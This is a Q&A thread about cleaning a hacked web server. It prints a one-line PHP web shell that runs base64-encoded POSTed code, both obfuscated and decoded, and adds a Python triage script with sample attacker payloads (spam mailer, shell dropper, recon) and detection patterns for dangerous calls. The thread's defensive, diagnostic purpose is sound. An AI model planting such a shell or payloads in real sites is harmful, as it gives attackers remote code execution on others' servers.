Malicious PHP file found on my webserver, need help cleaning and preventing this from happening again [closed]

My hosting provider recently suspended my website because something on it was sending out enormous amounts of spam email. Originally the provider and I thought that this was due to an unsecured form for an email campaign I put up on the server a couple of days prior. I removed the page with the form from the server, but the server was still sending spam emails.

I found a php file named 7c32.php in the "css" folder in the root directory of the server. I definitely did not make it. Here is the code that was in the file:

<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>

After running it through an online decoder, this is what it came up with:

if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));}

I did some reading about malicious php files and saw that the eval( and base64_decode strings were highly suspect. I looked through the server log file and saw several post queries with this 7c32.php file originating from an ip address from Saudi Arabia.

I deleted the php file, updated all outdated wordpress themes and plugins (as well as the platform itself), and changed the password to the FTP server and Wordpress administrative account to something much more secure.

Is there anything else I can do to ensure my server is secure? I'm about to go search for these base64 and eval( strings in every other php file on the server, but other than that, I'm out of ideas.

This php script seems rather too short to do any damage, but what else can be sending out all of that spam mail?

Any help would be greatly appreciated.

Youngman answered 4/6, 2013 at 5:18 Comment(2)
If you deleted the file and updated your WP themes, I would say there isn't much to do, just protect your site by denying upload permission to your folders/Elisaelisabet
Duplicate of: How to get rid of eval-base64_decode like PHP virus files?Gamboge

eval() is a very dangerous little language construct in that it can execute practically any piece of PHP code passed to it as a string, so it certainly could be that script sending the mail, although sending out spam is actually fairly non-destructive as far as what eval() could do.

If your page had the permissions to delete every file in your web root, eval() would also be able to do it too, just by someone sending the right command to the script via POST.

If you really want to ensure it is that piece of code sending out the mail, put it back but modify it to your advantage. Stop it from using eval() and instead save the POST data to a database or text file. It is the only way you will know exactly what this code is being used for.

Sarre answered 4/6, 2013 at 5:30 Comment(2)
Could you please tell me how to do this, I have absolutely no experience in PHP, I'm just learning the hard way. Figuring out whether or not this is the code that is sending the spam would be amazing.Youngman
Try this line of code instead of what was in there: <?php if(isset($_POST["code"])){$log = fopen("malLog", "a");fwrite($log, base64_encode($_POST["code"]) . "\n");fclose($log);}?>. Every time the page is accessed it will try to open (or create) a file named "malLog" and write into it the string that the previous bad code was trying to eval(). Can't guarantee it will work, I'm on the clock and don't have time to test it properly right now.Sarre

This php script seems rather too short to do any damage, but what else can be sending out all of that spam mail?

How do you believe this code is too short to damage? It is the worst possible code there with eval().

The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

They can execute any PHP code using that too short code. Eval is EVIL. Do not allow file upload permissions without validation.

but what else can be sending out all of that spam mail?

That same very eval code is sending emails. They post email code to it and it in turn executes it and sends out the email.

Archy answered 4/6, 2013 at 5:29 Comment(8)
Ah, I see now. I have no experience with PHP at all, so I barely understood what I was looking at. How can I tell the server to disallow file upload permissions without validation?Youngman
First of all set your directory permissions to read only, so that no upload is possible. Secondly check any of your file upload codes and / or post them here to discuss what flaws that could have. Whenever you receive any input from user you have to try to sanitize it and not save it on the server as it is. This loophole must be in your file upload form.Archy
Ok, I went into filezilla, selected all three directories in the root and applied the following permissions (unchecked everything but read) i.imgur.com/mklzSfQ.png Forgive my ignorance but what exactly are file upload codes? Thank you for all your help by the way.Youngman
I mean do you have any HTML or PHP code in there where you allow users to upload any file? or did you install some script etc?Archy
No, definitely not. The only uploads are done through FTP. Two questions: do I have to change the permissions again to upload new things to the server? Can I make it so only I can upload things through FTP?Youngman
ok, then is your FTP login secure enough?Archy
Yes. I changed it to a huge string of letters and numbers.Youngman
let us continue this discussion in chatYoungman
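Sarre's answer suggests swapping eval() for a logger to learn what the shell is used for, and Archy's answer asserts that the POSTed code is what sends the mail. The script below is an added example, not code from the thread, that closes that loop: it reads the lines the logging stand-in writes and reports what each captured payload does. It assumes the format from Sarre's comment, one line per request holding base64_encode() of the POSTed "code" field. Because that field is itself base64 (the original shell ran base64_decode() on it), each logged line is encoded twice, so the decoder peels layers until the result stops looking like base64. The three payloads in SAMPLE_PAYLOADS are constructed for the demonstration.

```python
"""Triage the payloads captured by the logging stand-in for css/7c32.php.

Added example, not code from the thread. It assumes the log format from the
replacement script in the answer above: one line per request, holding
base64_encode() of the POSTed "code" field. Because that field is itself base64
(the original shell ran base64_decode() on it), every line is encoded twice;
peel_base64() keeps decoding until the result stops looking like base64.
The sample log is constructed inline from three made-up payloads.
"""
import base64
import binascii
import re

_B64_ALPHABET = re.compile(r'^[A-Za-z0-9+/=\s]+$')

# What the decoded PHP does, judged by the functions it calls.
INDICATORS = {
    "sends_mail": re.compile(r'\bmail\s*\(', re.I),
    "runs_commands": re.compile(r'\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(', re.I),
    "writes_files": re.compile(r'\b(file_put_contents|fwrite|fopen|move_uploaded_file)\s*\(', re.I),
    "nested_eval": re.compile(r'\beval\s*\(', re.I),
    "fetches_remote": re.compile(r'\b(curl_init|file_get_contents)\s*\(\s*["\']https?://', re.I),
    "recon": re.compile(r'\b(phpinfo|php_uname|get_current_user|ini_get)\s*\(', re.I),
}


def peel_base64(blob: str, max_layers: int = 5):
    """Decode nested base64; returns (layers removed, innermost text).

    Stops as soon as the text contains a character outside the base64 alphabet
    (PHP always has '$', '(' or ';') or when decoding fails.
    """
    text = blob.strip()
    layers = 0
    while layers < max_layers and text and _B64_ALPHABET.match(text):
        try:
            raw = base64.b64decode(text)
        except (binascii.Error, ValueError):
            break
        text = raw.decode("utf-8", errors="replace")
        layers += 1
    return layers, text


def triage_line(line: str) -> dict:
    """Decode one log line and classify the PHP it carried."""
    layers, php = peel_base64(line)
    return {
        "layers": layers,
        "php": php,
        "indicators": [name for name, rx in INDICATORS.items() if rx.search(php)],
    }


def triage_log(lines) -> list:
    return [triage_line(line) for line in lines if line.strip()]


# Constructed payloads: (label, PHP the attacker sent, encoding layers in the log).
# The first two are logged the way the stand-in logs them (base64 of base64);
# the third is single-encoded, as a hand-edited log entry might be.
SAMPLE_PAYLOADS = [
    ("mailer",
     '$to="victim@example.com";mail($to,"Hi","spam body","From: sales@example.com");', 2),
    ("dropper",
     'file_put_contents("css/7c32.php",base64_decode("PD9waHA="));', 2),
    ("recon",
     'echo php_uname(); echo ini_get("disable_functions");', 1),
]


def build_sample_log() -> list:
    """Encode SAMPLE_PAYLOADS into log lines as the logging stand-in would."""
    lines = []
    for _label, php, layers in SAMPLE_PAYLOADS:
        blob = php
        for _ in range(layers):
            blob = base64.b64encode(blob.encode("utf-8")).decode("ascii")
        lines.append(blob)
    return lines


if __name__ == "__main__":
    for (label, _php, _n), result in zip(SAMPLE_PAYLOADS, triage_log(build_sample_log())):
        print(f"{label}: {result['layers']} layer(s), {result['indicators'] or 'no indicators'}")
        print("   ", result["php"])
```

To use it on the real capture, pass the lines of the "malLog" file to triage_log(). A "sends_mail" indicator on the captured payloads is the direct confirmation the question asks for; "writes_files" is the other one to watch for, because it means the attacker was re-dropping the shell (or another file) and deleting 7c32.php alone was not enough.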

© 2022 - 2024 — McMap. All rights reserved.